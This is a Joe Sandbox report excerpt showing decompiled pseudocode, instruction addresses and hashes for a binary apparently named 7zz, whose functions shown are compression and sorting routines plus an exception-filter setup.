													if(_t431 >=  *((intOrPtr*)(_t506 + 0x304))) {
														goto L82;
													} else {
														_t319 =  *(_t506 + 0x3c);
														 *((intOrPtr*)(_t319 + _t267 * 4)) =  *((intOrPtr*)(_t319 + _t267 * 4)) + 1;
														_t378 = _t431;
														 *(_t319 + 0x400 + _t378 * 4) = _t267;
														 *(_t506 + 0x1c) = _t378 + 1;
														goto L50;
													}
												}
											}
										} else {
											_t484 =  *((intOrPtr*)(_t506 + 0x38));
											if(_t484 >=  *((intOrPtr*)(_t506 + 0x40))) {
												goto L82;
											} else {
												 *((intOrPtr*)(_t506 + 0x18)) = 0x32;
												_t497 = (0xbadbad << 4) +  *((intOrPtr*)(_t506 + 0x30c));
												 *((intOrPtr*)(_t506 + 0x38)) = _t484 + 1;
												goto L54;
											}
										}
										goto L83;
									}
								}
							}
						}
					}
				}
				L83:
			}

0x004469a9
0x004469b5
0x004469b9
0x004469bd
0x004469c9
0x004469c9
0x004469d2
0x004469de
0x004469e9
0x00446fde
0x00446fea
0x004469ef
0x004469fd
0x004469fd
0x004469ff
0x00446a01
0x00446a03
0x00446a07
0x00446a0e
0x00446a12
0x00446a13
0x00446a18
0x00446a1a
0x00446a25
0x00446a32
0x00446a52
0x00446a55
0x00446a55
0x00446a57
0x00446a58
0x00446a62
0x00446a66
0x00000000
0x00446a6c
0x00446a78
0x00446a7d
0x00446a81
0x00000000
0x00446a90
0x00446a9c
0x00446aa1
0x00446aa5
0x00000000
0x00446ab7
0x00446ab7
0x00446ab9
0x00446ab9
0x00446abd
0x00446abe
0x00446ac2
0x00446ac9
0x00446acb
0x00446acf
0x00446ad8
0x00446af4
0x00446af4
0x00446afa
0x00446b00
0x00446b04
0x00446b05
0x00000000
0x00446ada
0x00446ada
0x00446ade
0x00446ae1
0x00000000
0x00000000
0x00446af2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00446af2
0x00000000
0x00446ada
0x00000000
0x00446b09
0x00446b09
0x00446b0c
0x00446b0f
0x00446b0f
0x00446b15
0x00446b1c
0x00446b20
0x00446b28
0x00446b36
0x00446b3b
0x00446b3f
0x00446b8d
0x00446b9b
0x00446bab
0x00446bab
0x00000000
0x00446b41
0x00446b41
0x00446b5e
0x00446b76
0x00446b7d
0x00446b83
0x00000000
0x00446b85
0x00446b8b
0x00000000
0x00000000
0x00446bad
0x00446bb8
0x00446bbe
0x00446bbe
0x00446bc0
0x00446bc2
0x00446bdd
0x00446be3
0x00446be4
0x00446bed
0x00446bef
0x00000000
0x00446bf1
0x00446bf1
0x00446bf3
0x00446bf5
0x00446bf9
0x00446bfb
0x00446bfe
0x00446c02
0x00446c07
0x00446c14
0x00446c1c
0x00446c20
0x00000000
0x00000000
0x00446c29
0x00446c2e
0x00446c30
0x00446c30
0x00446c32
0x00446c3d
0x00446c42
0x00446c46
0x00446c4d
0x00446c52
0x00446c57
0x00446c59
0x00446c5b
0x00446c62
0x00446c66
0x00446c6a
0x00446c78
0x00446c7c
0x00446c86
0x00446c86
0x00446c88
0x00446c8e
0x00446c92
0x00446c94
0x00446c94
0x00446c57
0x00446c98
0x00446c9c
0x00000000
0x00446ca2
0x00446ca2
0x00446ca4
0x00446caf
0x00446cb1
0x00446cbf
0x00446cc7
0x00446cc7
0x00446cc9
0x00446cca
0x00000000
0x00446ca4
0x00000000
0x00446c9c
0x00000000
0x00446c07
0x00000000
0x00446bef
0x00000000
0x00446bc2
0x00446b60
0x00446b72
0x00000000
0x00446b72
0x00000000
0x00446b5e
0x00000000
0x00446b41
0x00000000
0x00446cd2
0x00446cda
0x00446cdb
0x00446ce3
0x00446ce3
0x00446ced
0x00446cfa
0x00446cfc
0x00446cfc
0x00446cfe
0x00446d02
0x00446d06
0x00446d0a
0x00446d0e
0x00446d12
0x00446d12
0x00446d12
0x00000000
0x00446d16
0x00446d1c
0x00446d5e
0x00446d74
0x00446d7b
0x00446d83
0x00446d9a
0x00446d9a
0x00446d9f
0x00446da4
0x00446da6
0x00446da6
0x00446da9
0x00446dac
0x00446dad
0x00446da6
0x00446d85
0x00446d93
0x00446d93
0x00446db3
0x00446db7
0x00446dbc
0x00446dbe
0x00446dbe
0x00446dc6
0x00446de1
0x00446de5
0x00446dc8
0x00446dcf
0x00446dd4
0x00446dd8
0x00446dd8
0x00446dfc
0x00446dff
0x00446e04
0x00446e06
0x00446dbe
0x00446e16
0x00446e1a
0x00446e24
0x00446f70
0x00446f7a
0x00000000
0x00446f80
0x00446f87
0x00446f91
0x00446f94
0x00446fa1
0x00446fa7
0x00000000
0x00446fa9
0x00000000
0x00446fa9
0x00446fa7
0x00446e2a
0x00446e2a
0x00446e2d
0x00446e33
0x00446e3c
0x00446e40
0x00446e44
0x00446e4e
0x00446e51
0x00446e58
0x00446e58
0x00446e5a
0x00446e5b
0x00446e5e
0x00446e5e
0x00446e61
0x00446e65
0x00446e69
0x00446e69
0x00446e71
0x00446e77
0x00446fb1
0x00000000
0x00446fb3
0x00446fba
0x00446fc6
0x00446fcd
0x00446fd8
0x00446fd8
0x00446e7d
0x00446e7d
0x00446e83
0x00446e86
0x00446e90
0x00446e96
0x00446e98
0x00446ea0
0x00446ea2
0x00446eb1
0x00446eb3
0x00446eb5
0x00446ebc
0x00446ec1
0x00446ec1
0x00446ec4
0x00446ec8
0x00446ed0
0x00446ed2
0x00446ed6
0x00446ed9
0x00446ed9
0x00446edb
0x00446ee0
0x00446ef2
0x00446ef9
0x00446eff
0x00446f00
0x00446f02
0x00446f02
0x00446ed9
0x00446f28
0x00446f35
0x00446f45
0x00446f4c
0x00000000
0x00446f52
0x00446f52
0x00446f5a
0x00446f5d
0x00446f5f
0x00446f67
0x00000000
0x00446f67
0x00446f4c
0x00446e77
0x00446d1e
0x00446d1e
0x00446d28
0x00000000
0x00446d2e
0x00446d37
0x00446d57
0x00446d5a
0x00000000
0x00446d5a
0x00446d28
0x00000000
0x00446d1c
0x00446d16
0x00446d12
0x00446aa5
0x00446a81
0x00446a66
0x00000000

Strings

2, xrefs: 00446D37

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: c070dbbcf1ae0897f8dc3b144dd62823fae68c0fa4a6491ef46143b1d8e6ff57
Instruction ID: 742eb6958adcedc066f5cc90f716e9b3af231f0b1192ff8565896ec2cdea9a5d
Opcode Fuzzy Hash: c070dbbcf1ae0897f8dc3b144dd62823fae68c0fa4a6491ef46143b1d8e6ff57
Instruction Fuzzy Hash: 7D02A2716043518BE718DF18D49026AF7E2EFCA308F16493EE9D6D7341DA38E946CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00459170 Relevance: 1.6, Strings: 1, Instructions: 333
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00459170(void* __ecx, signed char* __edx) {
				void* _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				signed int _t207;
				signed int _t210;
				signed int _t214;
				signed int* _t216;
				void* _t219;
				void* _t226;
				intOrPtr _t231;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t248;
				signed char _t249;
				signed int _t252;
				signed int _t256;
				signed int _t257;
				intOrPtr _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed char* _t291;
				signed int _t292;
				signed int* _t294;
				signed int _t296;
				intOrPtr _t297;
				signed int _t305;
				signed int _t310;
				signed int _t315;
				signed int _t320;
				unsigned int _t327;
				void* _t328;
				signed int* _t331;
				signed int _t332;
				void* _t339;
				signed int _t340;
				signed int _t344;
				void* _t345;
				signed int _t346;
				unsigned int _t349;
				intOrPtr _t350;
				signed int _t354;
				void* _t363;
				void* _t364;

				_t291 = __edx;
				_t346 =  *(_t363 + 0x24);
				_t226 = __ecx;
				_t339 = __ecx + _t346 * 4;
				_t195 = memset(_t339, 0, 0x10000 << 2);
				_t364 = _t363 + 0xc;
				_t327 = _t346 - 1;
				 *(_t364 + 0x18) = _t339;
				 *(_t364 + 0x24) = _t327;
				if(_t327 != 0) {
					do {
						 *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) + 1;
						_t195 = _t195 + 1;
					} while (_t195 < _t327);
				}
				 *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) + 1;
				_t328 = 0;
				_t200 = 0;
				do {
					_t231 =  *((intOrPtr*)(_t339 + _t200 * 4));
					if(_t231 != 0) {
						_t328 = _t328 + _t231;
					}
					 *((intOrPtr*)(_t339 + _t200 * 4)) = _t328 - _t231;
					_t200 = _t200 + 1;
				} while (_t200 < 0x10000);
				_t349 =  *(_t364 + 0x24);
				_t201 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 | _t291[_t201 + 1] & 0x000000ff) * 4));
						_t201 = _t201 + 1;
					} while (_t201 < _t349);
				}
				 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4));
				_t202 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t226 +  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) * 4)) = _t202;
						 *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) =  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) + 1;
						_t202 = _t202 + 1;
					} while (_t202 < _t349);
				}
				 *((intOrPtr*)(_t226 +  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) * 4)) = _t202;
				 *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) =  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) + 1;
				_t207 = 0;
				_t331 = _t339 + 8;
				 *(_t364 + 0x14) = 0x4000;
				do {
					_t242 =  *(_t331 - 8) - _t207;
					if(_t242 != 0) {
						_t272 = _t242 - 1;
						if(_t272 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t272 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t320 =  *(_t226 + _t207 * 4);
							if(_t272 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t320 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t272 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 8);
					}
					_t244 =  *(_t331 - 4) - _t207;
					if(_t244 != 0) {
						_t269 = _t244 - 1;
						if(_t269 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t269 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t315 =  *(_t226 + _t207 * 4);
							if(_t269 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t315 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t269 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 4);
					}
					_t246 =  *_t331 - _t207;
					if(_t246 != 0) {
						_t266 = _t246 - 1;
						if(_t266 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t266 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t310 =  *(_t226 + _t207 * 4);
							if(_t266 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t310 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t266 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *_t331;
					}
					_t248 = _t331[1] - _t207;
					if(_t248 != 0) {
						_t263 = _t248 - 1;
						if(_t263 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t263 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t305 =  *(_t226 + _t207 * 4);
							if(_t263 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t305 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t263 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 = _t331[1];
					}
					_t331 =  &(_t331[4]);
					_t123 = _t364 + 0x14;
					 *_t123 =  *(_t364 + 0x14) - 1;
				} while ( *_t123 != 0);
				_t249 = 0;
				if(_t349 != 0) {
					do {
						_t249 = _t249 + 1;
					} while (_t349 >> _t249 != 0);
				}
				 *((intOrPtr*)(_t364 + 0x20)) = 0x20;
				if(0x20 - _t249 > 0xc) {
					 *((intOrPtr*)(_t364 + 0x20)) = 0xc;
				}
				 *(_t364 + 0x14) = 2;
				while(1) {
					_t332 = 0;
					_t350 = 0;
					 *((intOrPtr*)(_t364 + 0x10)) = 0;
					 *(_t364 + 0x24) = 0;
					if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
						break;
					} else {
						goto L40;
					}
					do {
						L40:
						_t214 =  *(_t226 + _t332 * 4);
						_t294 = _t226 + _t332 * 4;
						_t344 = _t214 >> 0x00000014 & 0x000003ff;
						_t256 =  !(_t214 >> 0x1f) & 0x00000001;
						if((_t214 & 0x40000000) != 0) {
							_t344 = _t344 + (_t294[1] >> 0x0000000a & 0x003ffc00);
							_t294[1] = _t294[1] & 0x000fffff;
							_t350 =  *((intOrPtr*)(_t364 + 0x10));
						}
						_t345 = _t344 + 1;
						 *_t294 = _t214 & 0x000fffff;
						if(_t256 != 0 || _t345 == 1) {
							_t296 = _t332 - _t350;
							 *(_t226 + _t296 * 4) =  *(_t226 + _t296 * 4) & 0x000fffff;
							_t216 = _t226 + _t296 * 4;
							if(_t350 > 1) {
								_t216[1] = _t216[1] & 0x000fffff;
							}
							_t297 = _t345 + _t350;
							_t166 = _t297 - 1; // -1
							_t257 = _t166;
							 *_t216 =  *_t216 | (_t257 & 0x000003ff) << 0x00000014;
							_t354 =  *_t216;
							if(_t297 > 0x400) {
								_t216[1] = _t216[1] | (_t257 & 0xfffffc00) << 0x0000000a;
								 *_t216 = _t354 | 0x40000000;
							}
							_t350 = _t297;
							 *((intOrPtr*)(_t364 + 0x10)) = _t350;
						} else {
							_t260 =  *((intOrPtr*)(_t364 + 0x2c));
							_t350 = 0;
							 *((intOrPtr*)(_t364 + 0x10)) = 0;
							if( *(_t364 + 0x14) < _t260) {
								_push(_t260);
								_push(0);
								_push(_t226);
								_push( *((intOrPtr*)(_t364 + 0x20)));
								_push(_t345);
								_push(_t332);
								if(E00458D60(_t260,  *(_t364 + 0x14)) != 0) {
									 *(_t364 + 0x24) = _t345 + _t332;
								}
							} else {
								_t219 = 0;
								if(_t345 != 0) {
									 *(_t364 + 0x1c) = _t294;
									do {
										 *((intOrPtr*)( *(_t364 + 0x18) + 0x40000 +  *_t294 * 4)) = _t219 + _t332;
										_t219 = _t219 + 1;
										_t294 =  &(( *(_t364 + 0x1c))[1]);
										 *(_t364 + 0x1c) = _t294;
									} while (_t219 < _t345);
									_t350 =  *((intOrPtr*)(_t364 + 0x10));
								}
							}
						}
						_t332 = _t332 + _t345;
					} while (_t332 <  *((intOrPtr*)(_t364 + 0x2c)));
					_t339 =  *(_t364 + 0x18);
					if( *(_t364 + 0x24) != 0) {
						 *(_t364 + 0x14) =  *(_t364 + 0x14) << 1;
						continue;
					}
					break;
				}
				_t210 = 0;
				if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
					return  *((intOrPtr*)(_t339 + 0x40000));
				} else {
					do {
						_t340 =  *(_t226 + _t210 * 4);
						_t252 = _t340 >> 0x00000014 & 0x000003ff;
						if((_t340 & 0x40000000) != 0) {
							_t292 =  *(_t226 + 4 + _t210 * 4);
							_t252 = _t252 + (_t292 >> 0x0000000a & 0x003ffc00);
							 *(_t226 + 4 + _t210 * 4) = _t292 & 0x000fffff;
						}
						 *(_t226 + _t210 * 4) = _t340 & 0x000fffff;
						_t210 = _t210 + _t252 + 1;
					} while (_t210 <  *((intOrPtr*)(_t364 + 0x2c)));
					return  *((intOrPtr*)( *(_t364 + 0x18) + 0x40000));
				}
			}

0x00459170
0x00459175
0x00459179
0x0045917d
0x00459189
0x00459189
0x0045918b
0x0045918e
0x00459192
0x00459198
0x004591a0
0x004591ae
0x004591b4
0x004591b5
0x004591a0
0x004591c5
0x004591cb
0x004591cd
0x004591d0
0x004591d0
0x004591d5
0x004591d7
0x004591d7
0x004591dd
0x004591e0
0x004591e1
0x004591e8
0x004591ec
0x004591f0
0x004591f2
0x00459203
0x0045920a
0x0045920b
0x004591f2
0x0045921e
0x00459225
0x00459229
0x00459230
0x00459241
0x00459252
0x00459258
0x00459259
0x00459230
0x0045926c
0x0045927b
0x00459281
0x00459283
0x00459286
0x00459290
0x00459293
0x00459295
0x00459297
0x00459298
0x004592ab
0x004592ae
0x004592b7
0x004592c5
0x004592cf
0x004592cf
0x004592b7
0x004592d1
0x004592d1
0x004592d7
0x004592d9
0x004592db
0x004592dc
0x004592ef
0x004592f2
0x004592fb
0x00459309
0x00459313
0x00459313
0x004592fb
0x00459315
0x00459315
0x0045931a
0x0045931c
0x0045931e
0x0045931f
0x00459332
0x00459335
0x0045933e
0x0045934c
0x00459356
0x00459356
0x0045933e
0x00459358
0x00459358
0x0045935d
0x0045935f
0x00459361
0x00459362
0x00459375
0x00459378
0x00459381
0x0045938f
0x00459399
0x00459399
0x00459381
0x0045939b
0x0045939b
0x0045939e
0x004593a1
0x004593a1
0x004593a1
0x004593ab
0x004593af
0x004593b1
0x004593b1
0x004593b6
0x004593b1
0x004593c1
0x004593c8
0x004593ca
0x004593ca
0x004593d2
0x004593e0
0x004593e0
0x004593e2
0x004593e4
0x004593e8
0x004593f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004593f6
0x004593f6
0x004593f6
0x004593f9
0x00459408
0x0045940e
0x00459416
0x00459424
0x0045942f
0x00459432
0x00459432
0x0045943b
0x0045943c
0x00459440
0x004594ae
0x004594b0
0x004594b7
0x004594bd
0x004594bf
0x004594bf
0x004594c6
0x004594c9
0x004594c9
0x004594d7
0x004594d9
0x004594e1
0x004594f2
0x004594f5
0x004594f5
0x004594f7
0x004594f9
0x00459447
0x00459447
0x0045944b
0x0045944d
0x00459455
0x00459493
0x00459494
0x00459496
0x00459497
0x00459498
0x00459499
0x004594a1
0x004594a6
0x004594a6
0x00459457
0x00459457
0x0045945b
0x00459461
0x00459465
0x0045946e
0x00459479
0x0045947a
0x0045947d
0x00459481
0x00459485
0x00459485
0x0045945b
0x00459455
0x004594fd
0x004594ff
0x0045950e
0x00459512
0x00459514
0x00000000
0x00459514
0x00000000
0x00459512
0x0045951d
0x00459523
0x0045958a
0x00459525
0x00459525
0x00459525
0x0045952d
0x00459539
0x0045953b
0x0045954a
0x00459552
0x00459552
0x0045955c
0x0045955f
0x00459563
0x0045957a
0x0045957a

Strings

YA1, xrefs: 00459173

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID: YA1
API String ID: 0-613462611
Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
Instruction ID: dd7e7172c6b64ed9de0095458c467a227dd947ad75ddcf7282d203c4dea92fff
Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
Instruction Fuzzy Hash: 6FD1F1715046168FD729CF1DC494236BBE1EF86305F094ABEED928B386D7389D19CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0046E6BC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0046E6C1

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
Instruction ID: e72988c6cc3c963252b8e5e8b60d16be35970219d15e6aeca3667ec21c81da3b
Opcode Fuzzy Hash: 96d1a218dc145cbfe683c815ed6cd5901e87ae0f4932733bae86baee2274f339
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004442E0 Relevance: .7, Instructions: 713
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E004442E0(intOrPtr __ecx) {
				signed int _t310;
				signed int _t312;
				void* _t328;
				signed int _t330;
				signed int _t334;
				intOrPtr _t340;
				signed int _t346;
				signed int _t347;
				intOrPtr _t352;
				signed int _t357;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t384;
				unsigned int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t402;
				unsigned int _t404;
				signed int _t407;
				signed int _t411;
				void* _t414;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t428;
				signed int _t437;
				signed int _t443;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t451;
				signed char _t452;
				signed char _t453;
				signed char _t460;
				signed int _t461;
				signed char _t462;
				intOrPtr* _t483;
				signed int _t486;
				void* _t490;
				signed int _t493;
				signed int _t494;
				intOrPtr* _t499;
				signed int _t517;
				signed int _t545;
				intOrPtr _t548;
				intOrPtr _t567;
				unsigned int _t568;
				intOrPtr _t569;
				signed int _t580;
				unsigned int _t582;
				intOrPtr _t589;
				signed int _t593;
				signed int _t597;
				intOrPtr _t607;
				void* _t611;
				signed int _t612;
				signed int _t613;
				intOrPtr _t614;
				signed int _t615;
				intOrPtr _t616;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				signed int* _t626;
				signed int _t627;
				intOrPtr _t628;
				intOrPtr* _t629;
				signed int _t630;
				signed int* _t631;
				signed int _t632;
				signed int _t634;
				signed int* _t640;
				intOrPtr _t641;
				intOrPtr _t643;
				intOrPtr _t644;
				void* _t648;
				signed int _t649;
				signed int _t650;
				signed int _t653;
				unsigned int _t657;
				void* _t658;
				intOrPtr _t660;
				void* _t661;

				_push(0xffffffff);
				_push(E004791D0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t660;
				_t661 = _t660 - 0x60;
				_t607 = __ecx;
				 *((intOrPtr*)(_t661 + 0x10)) = __ecx;
				if( *(_t661 + 0x78) != 1) {
					L141:
					_t310 = 0x80070057;
					L142:
					 *[fs:0x0] =  *((intOrPtr*)(_t661 + 0x70));
					return _t310;
				}
				_t664 =  *(_t661 + 0x94) - 4;
				if( *(_t661 + 0x94) != 4) {
					goto L141;
				}
				if(E00444040(__ecx, _t664) != 0) {
					_t312 =  *(_t661 + 0x84);
					__eflags = _t312;
					 *(_t661 + 0x88) = 0;
					 *((intOrPtr*)(_t661 + 0x58)) = 0;
					 *(_t661 + 0x5c) = 0;
					if(_t312 == 0) {
						L10:
						 *((intOrPtr*)(_t661 + 0x34)) = _t607;
						_t638 =  *(_t661 + 0x8c);
						 *(_t661 + 0x78) = 0;
						_t450 =  *( *(_t661 + 0x80));
						 *(_t661 + 0x28) = _t450;
						E0040EEC1(_t607 + 0x10,  *( *(_t661 + 0x8c)));
						E0040EED0(_t607 + 0x10);
						E0040EEC1(_t607 + 0x38,  *((intOrPtr*)( *(_t661 + 0x8c) + 4)));
						E0040EED0(_t607 + 0x38);
						E0040EEC1(_t607 + 0x60,  *((intOrPtr*)( *(_t661 + 0x8c) + 8)));
						E0040EED0(_t607 + 0x60);
						E0040EEC1(_t607 + 0xa0,  *((intOrPtr*)(_t638 + 0xc)));
						_t640 = _t607 + 0x88;
						E0040EED0( &(_t640[6]));
						_t640[2] = 0;
						_t640[3] = 0;
						_t640[4] = 0xffffffff;
						 *_t640 = 1;
						_t640[1] = 0;
						memset(_t607 + 0xc8, 0x400, 0x102 << 2);
						_t661 = _t661 + 0xc;
						 *(_t661 + 0x14) = 0;
						 *(_t661 + 0x84) = 1;
						 *((intOrPtr*)( *_t450))(_t450, 0x47a4e8, _t661 + 0x14);
						_t451 = 0;
						__eflags = 0;
						 *((intOrPtr*)(_t661 + 0x18)) = 0;
						 *((intOrPtr*)(_t661 + 0x48)) = 0;
						 *((intOrPtr*)(_t661 + 0x4c)) = 0;
						 *(_t661 + 0x80) = 0;
						 *((intOrPtr*)(_t661 + 0x50)) = 0;
						 *((intOrPtr*)(_t661 + 0x54)) = 0;
						 *(_t661 + 0x40) = 0;
						 *(_t661 + 0x44) = 0;
						 *(_t661 + 0x38) = 0;
						 *(_t661 + 0x3c) = 0;
						while(1) {
							_t611 = 0;
							_t328 = 0x20000 - _t451;
							__eflags = 0x20000;
							if(0x20000 == 0) {
								goto L15;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								_t499 =  *((intOrPtr*)(_t661 + 0x24));
								_t653 =  *((intOrPtr*)( *_t499 + 0xc))(_t499,  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x18)) + 8)) + _t611 + _t451, _t328, _t661 + 0x28);
								__eflags = _t653;
								if(_t653 != 0) {
									break;
								}
								_t443 =  *(_t661 + 0x28);
								__eflags = _t443;
								if(_t443 == 0) {
									goto L15;
								}
								_t611 = _t611 + _t443;
								_t328 = 0x20000 - _t611 - _t451;
								__eflags = 0x20000;
								if(0x20000 != 0) {
									continue;
								}
								goto L15;
							}
							_t437 =  *(_t661 + 0x14);
							 *(_t661 + 0x78) = 0;
							__eflags = _t437;
							if(_t437 != 0) {
								 *((intOrPtr*)( *_t437 + 8))(_t437);
							}
							_t642 =  *((intOrPtr*)(_t661 + 0x10));
							 *(_t661 + 0x78) = 0xffffffff;
							E00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x24);
							E00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x4c);
							E00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x74);
							E00437D6C(_t642 + 0xb4);
							_t310 = _t653;
							goto L142;
							L15:
							_t612 = _t611 + _t451;
							__eflags = _t612 - 5;
							 *(_t661 + 0x20) = _t612;
							if(_t612 < 5) {
								_t648 = 0;
								__eflags = _t612;
								if(__eflags <= 0) {
									L119:
									_t641 =  *((intOrPtr*)(_t661 + 0x10));
